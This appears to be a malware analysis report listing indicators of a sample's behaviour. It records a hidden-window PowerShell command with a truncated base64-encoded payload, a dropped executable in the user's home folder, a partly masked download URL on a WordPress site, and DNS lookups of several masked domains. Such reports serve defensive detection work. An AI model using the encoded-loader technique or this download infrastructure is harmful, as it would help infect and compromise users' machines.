Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGUAaABzAGIAaABlAGwAZAB6AGcAPQAnAEgAcAB2AHMAagBxAHQAYgAnADsAJABSAGgAcwBlAGMAcQBmAGYAIAA9ACAAJwA2AD...
- %HOMEPATH%\687.exe
- %HOMEPATH%\687.exe
- http://me#####.nmconline.org/wp-content/pgynuy3gyq-qib01-12349/
- DNS ASK me#####.nmconline.org
- DNS ASK ho####earlane.com
- DNS ASK ra######.000webhostapp.com
- DNS ASK ro#########orsdesign.000webhostapp.com
- DNS ASK st####hpilates.fit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGUAaABzAGIAaABlAGwAZAB6AGcAPQAnAEgAcAB2AHMAagBxAHQAYgAnADsAJABSAGgAcwBlAGMAcQBmAGYAIAA9ACAAJwA2AD...' (with hidden window)